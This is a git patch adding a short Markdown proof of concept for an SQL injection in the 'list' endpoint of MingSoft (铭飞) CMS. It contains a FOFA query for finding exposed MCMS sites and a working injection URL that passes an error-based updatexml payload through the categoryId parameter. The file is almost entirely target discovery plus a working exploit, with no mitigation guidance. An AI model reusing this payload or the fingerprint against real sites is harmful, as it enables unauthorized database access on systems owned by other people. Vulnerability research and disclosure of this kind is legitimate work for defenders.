From beed962c235550a828a465e88ab80c5f408b517a Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 23 Dec 2023 18:24:34 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=93=AD=E9=A3=9ECMS=20list=E6=8E=A5?=
 =?UTF-8?q?=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 铭飞CMS list接口存在SQL注入.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)
 create mode 100644 铭飞CMS list接口存在SQL注入.md

diff --git a/铭飞CMS list接口存在SQL注入.md b/铭飞CMS list接口存在SQL注入.md
new file mode 100644
index 0000000..6fd8814
--- /dev/null
+++ b/铭飞CMS list接口存在SQL注入.md	
@@ -0,0 +1,12 @@
+## 铭飞CMS list接口存在SQL注入
+
+## fofa
+```
+body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
+```
+
+## poc
+```
+http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271
+```
+![image](https://github.com/wy876/POC/assets/139549762/9f9df303-e0b5-4707-a3a8-228e97ab74a0)